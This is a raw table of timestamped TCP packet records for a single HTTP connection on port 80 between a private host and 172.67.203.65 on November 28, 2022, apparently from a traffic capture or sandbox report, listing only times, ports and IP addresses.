Nov 28, 2022 12:46:57.755175114 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.755574942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755717039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755742073 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.755774021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755789042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755804062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755817890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755832911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755846977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755886078 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.756040096 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.756150007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756258965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756309032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756340027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756356001 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.756356955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756391048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756407022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756422043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756444931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756459951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756464958 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.756483078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756499052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756513119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756526947 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.756527901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.756699085 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.756787062 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.757066011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757181883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757245064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757260084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757275105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757288933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757301092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757453918 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.757457972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757647991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757652998 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.757689953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757718086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757733107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757747889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757771969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757786989 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.757787943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757786989 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.757810116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757824898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757843018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757859945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757874966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757884026 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.757895947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757914066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.757986069 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.758047104 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.758430004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758550882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758627892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.758686066 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.758708000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758727074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758742094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758758068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758771896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758786917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758800983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758816004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758820057 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.758820057 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.758830070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758845091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758860111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758873940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758888960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.758936882 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.759005070 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.759372950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759493113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759555101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759569883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759583950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759598017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759612083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759629965 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.759644032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759659052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759673119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759679079 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.759685993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759701014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759716034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759732008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759746075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.759747982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.759927034 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.760301113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760423899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760504961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760519981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760536909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760551929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760565996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760567904 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.760584116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760615110 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.760622978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760637999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760652065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760665894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760674953 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.760680914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.760788918 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.760941029 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.761082888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761235952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761255026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761260986 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.761269093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761284113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761297941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761312008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761326075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761339903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761353970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761358976 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.761368036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761382103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761395931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761409998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761439085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761495113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761557102 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.761564016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.761605024 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.761718035 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.762048006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762168884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762217999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762233019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762240887 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.762245893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762260914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762274981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762289047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762303114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762331009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762353897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762371063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762386084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762389898 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.762402058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762414932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762428999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762450933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.762501001 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.762550116 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.762681007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.763117075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.763223886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.763276100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.763288021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.763329983 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.763492107 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.763842106 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.764734983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.764854908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.764869928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.764884949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.764929056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.764964104 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.764986992 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765002966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765017986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765032053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765045881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765059948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765074015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765088081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765103102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765130043 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765160084 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765162945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765180111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765194893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765208960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765247107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765260935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765275002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765289068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765289068 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765302896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765316963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765331030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765336037 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765345097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765363932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765489101 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765628099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765749931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765806913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765822887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765836954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765851021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765860081 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.765865088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765878916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765892982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765906096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765919924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765933990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765948057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765963078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765976906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.765995026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766014099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766028881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766048908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766057014 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.766063929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766077995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766099930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766115904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766128063 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.766129971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766146898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766160965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766175032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.766227007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.766397953 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.771662951 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.771766901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.771908998 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.771915913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.771929979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.771944046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.771976948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.771991968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772062063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772078037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772092104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772099972 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772105932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772119045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772133112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772145987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772159100 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772160053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772173882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772186995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772202015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772221088 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772264957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772268057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772269011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772269964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772272110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772280931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772294998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772315025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772321939 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772326946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772341013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772355080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772367954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772411108 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772434950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772438049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772439003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772439957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772440910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772444010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772458076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772470951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772485018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772499084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772511959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772526026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772548914 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772552967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772566080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772578955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772591114 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772592068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772604942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772618055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772630930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772644043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772656918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772670031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772680998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772742987 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772787094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772877932 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.772912025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772959948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772974014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.772986889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.773000002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.773013115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.773024082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.773077011 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.773175001 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777029037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777137041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777153969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777168989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777214050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777228117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777241945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777254105 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777283907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777298927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777312994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777326107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777326107 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777343988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777360916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777374983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777389050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777404070 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777441025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777455091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777468920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777482986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777496099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777497053 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777509928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777534008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777545929 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777551889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777565956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777658939 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.777766943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777780056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.777821064 CET	49836	80	192.168.11.20	172.67.203.65
